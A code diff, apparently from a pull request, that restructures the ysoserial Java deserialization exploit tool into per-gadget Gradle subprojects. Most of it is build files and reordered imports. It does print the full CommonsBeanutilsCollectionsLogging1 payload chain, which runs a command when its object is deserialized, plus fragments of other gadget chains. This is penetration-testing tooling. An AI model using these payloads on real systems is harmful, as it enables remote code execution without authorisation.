Gradle build POC that isolate each gadget frohoff#10

.gitignore

@@ -1,7 +1,13 @@
-/target
+target/
+build/
+.gradle/
+pwntest
+
+#Eclipse
 .classpath
 .project
 .settings/
-pwntest
+
+#IntelliJ
 .idea/
-*.iml
+*.iml

build.gradle

@@ -0,0 +1,22 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+subprojects { //Common configuration for subprojects
+    apply plugin: 'java'
+
+    sourceCompatibility = 1.7
+
+    repositories {
+        mavenCentral()
+    }
+}
+
+
+subprojects {
+
+    compileJava {
+        options.encoding = 'UTF-8'
+        //options.compilerArgs << "-Xlint:unchecked" << "-Xlint:deprecation"
+        options.compilerArgs << "-Xlint:none"
+    }
+}

gadget-beanutils-cc3/build.gradle

@@ -0,0 +1,8 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'commons-beanutils', name: 'commons-beanutils', version: '1.9.2'
+    compile group: 'commons-collections', name: 'commons-collections', version: '3.1'
+    compile project(':ysoserial-core')
+}

src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java → gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java

@@ -1,44 +1,42 @@
-package ysoserial.payloads;
-
-import java.math.BigInteger;
-import java.util.PriorityQueue;
-
-import org.apache.commons.beanutils.BeanComparator;
-
-import ysoserial.payloads.annotation.Dependencies;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.payloads.util.PayloadRunner;
-import ysoserial.payloads.util.Reflections;
-
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-
-@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
-@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
-public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload<Object> {
-
-	public Object getObject(final String command) throws Exception {
-		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
-		// mock method name until armed
-		final BeanComparator comparator = new BeanComparator("lowestSetBit");
-
-		// create queue with numbers and basic comparator
-		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
-		// stub data for replacement later
-		queue.add(new BigInteger("1"));
-		queue.add(new BigInteger("1"));
-
-		// switch method called by comparator
-		Reflections.setFieldValue(comparator, "property", "outputProperties");
-
-		// switch contents of queue
-		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
-		queueArray[0] = templates;
-		queueArray[1] = templates;
-
-		return queue;
-	}
-
-	public static void main(final String[] args) throws Exception {
-		PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args);
-	}
+package ysoserial.payloads;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import org.apache.commons.beanutils.BeanComparator;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+import java.math.BigInteger;
+import java.util.PriorityQueue;
+
+@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
+@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
+public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload<Object> {
+
+	public Object getObject(final String command) throws Exception {
+		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+		// mock method name until armed
+		final BeanComparator comparator = new BeanComparator("lowestSetBit");
+
+		// create queue with numbers and basic comparator
+		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+		// stub data for replacement later
+		queue.add(new BigInteger("1"));
+		queue.add(new BigInteger("1"));
+
+		// switch method called by comparator
+		Reflections.setFieldValue(comparator, "property", "outputProperties");
+
+		// switch contents of queue
+		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = templates;
+		queueArray[1] = templates;
+
+		return queue;
+	}
+
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args);
+	}
 }

gadget-bsh/build.gradle

@@ -0,0 +1,7 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'org.beanshell', name: 'bsh', version: '2.0b5'
+    compile project(':ysoserial-core')
+}

src/main/java/ysoserial/payloads/BeanShell1.java → gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java

@@ -2,16 +2,14 @@
 
 import bsh.Interpreter;
 import bsh.XThis;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
 
-import java.io.*;
-import java.lang.reflect.Field;
 import java.lang.reflect.InvocationHandler;
 import java.lang.reflect.Proxy;
 import java.util.Comparator;
 import java.util.PriorityQueue;
-import ysoserial.payloads.util.Reflections;
-import ysoserial.payloads.annotation.Dependencies;
-import ysoserial.payloads.util.PayloadRunner;
 
 /**
  * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)

gadget-cc3/build.gradle

@@ -0,0 +1,7 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'commons-collections', name: 'commons-collections', version: '3.1'
+    compile project(':ysoserial-core')
+}

src/main/java/ysoserial/payloads/CommonsCollections1.java → gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java

@@ -1,20 +1,19 @@
 package ysoserial.payloads;
 
-import java.lang.reflect.InvocationHandler;
-import java.util.HashMap;
-import java.util.Map;
-
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
 import org.apache.commons.collections.functors.InvokerTransformer;
 import org.apache.commons.collections.map.LazyMap;
-
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
+
 /*
 	Gadget chain:	
 		ObjectInputStream.readObject()
@@ -67,8 +66,8 @@ public InvocationHandler getObject(final String command) throws Exception {
 
 		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
 
-		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
-				
+		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
+
 		return handler;
 	}
 

src/main/java/ysoserial/payloads/CommonsCollections3.java → gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java

@@ -1,27 +1,24 @@
 package ysoserial.payloads;
 
-import java.lang.reflect.InvocationHandler;
-import java.util.HashMap;
-import java.util.Map;
-
-import javax.xml.transform.Templates;
-
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
 import org.apache.commons.collections.functors.InstantiateTransformer;
 import org.apache.commons.collections.map.LazyMap;
-
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import javax.xml.transform.Templates;
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
 
 /*
- * Variation on CommonsCollections1 that uses InstantiateTransformer instead of
+ * Variation on ysoserial.commons.payloads.CommonsCollections1 that uses InstantiateTransformer instead of
  * InvokerTransformer.
  */
 @SuppressWarnings({"rawtypes", "unchecked"})

gadget-cc4/build.gradle

@@ -0,0 +1,7 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'org.apache.commons', name: 'commons-collections4', version: '4.0'
+    compile project(':ysoserial-core')
+}

src/main/java/ysoserial/payloads/CommonsCollections2.java → gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java

@@ -1,17 +1,15 @@
 package ysoserial.payloads;
 
-import java.util.PriorityQueue;
-import java.util.Queue;
-
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import org.apache.commons.collections4.comparators.TransformingComparator;
 import org.apache.commons.collections4.functors.InvokerTransformer;
-
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import java.util.PriorityQueue;
+import java.util.Queue;
 
 /*
 	Gadget chain:

src/main/java/ysoserial/payloads/CommonsCollections4.java → gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java

@@ -1,23 +1,20 @@
 package ysoserial.payloads;
 
-import java.util.PriorityQueue;
-import java.util.Queue;
-
-import javax.xml.transform.Templates;
-
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 import org.apache.commons.collections4.Transformer;
 import org.apache.commons.collections4.comparators.TransformingComparator;
 import org.apache.commons.collections4.functors.ChainedTransformer;
 import org.apache.commons.collections4.functors.ConstantTransformer;
 import org.apache.commons.collections4.functors.InstantiateTransformer;
-
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import javax.xml.transform.Templates;
+import java.util.PriorityQueue;
+import java.util.Queue;
 
 /*
  * Variation on CommonsCollections2 that uses InstantiateTransformer instead of

gadget-spring-aop/build.gradle

@@ -0,0 +1,9 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'org.springframework', name: 'spring-core', version: '3.0.5.RELEASE'
+    compile group: 'org.springframework', name: 'spring-beans', version: '3.0.5.RELEASE'
+    compile group: 'org.springframework', name: 'spring-aop', version: '3.0.5.RELEASE'
+    compile project(':ysoserial-core')
+}

src/main/java/ysoserial/payloads/SpringAop.java → gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java

@@ -1,28 +1,26 @@
 package ysoserial.payloads;
 
-import org.springframework.beans.factory.support.DefaultListableBeanFactory;
-import org.springframework.beans.factory.support.GenericBeanDefinition;
-import org.springframework.aop.target.SimpleBeanTargetSource;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
+import javassist.LoaderClassPath;
+import javassist.SerialVersionUID;
 import org.springframework.aop.framework.AdvisedSupport;
 import org.springframework.aop.framework.DefaultAopProxyFactory;
-
-import java.io.NotSerializableException;
-import java.lang.reflect.InvocationHandler;
-import java.lang.reflect.Proxy;
-
+import org.springframework.aop.target.SimpleBeanTargetSource;
 import org.springframework.beans.factory.config.BeanDefinition;
-
-import java.util.Collections;
-
 import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
-
+import org.springframework.beans.factory.support.DefaultListableBeanFactory;
+import org.springframework.beans.factory.support.GenericBeanDefinition;
 import ysoserial.payloads.annotation.Dependencies;
-import ysoserial.payloads.util.PrintUtil;
 import ysoserial.payloads.util.PayloadRunner;
-
-import javassist.*;
+import ysoserial.payloads.util.PrintUtil;
 import ysoserial.payloads.util.Reflections;
 
+import java.io.NotSerializableException;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.Collections;
 import java.util.List;
 
 /**

gadget-spring/build.gradle

@@ -0,0 +1,8 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+    compile group: 'org.springframework', name: 'spring-core', version: '4.1.4.RELEASE'
+    compile group: 'org.springframework', name: 'spring-beans', version: '4.1.4.RELEASE'
+    compile project(':ysoserial-core')
+}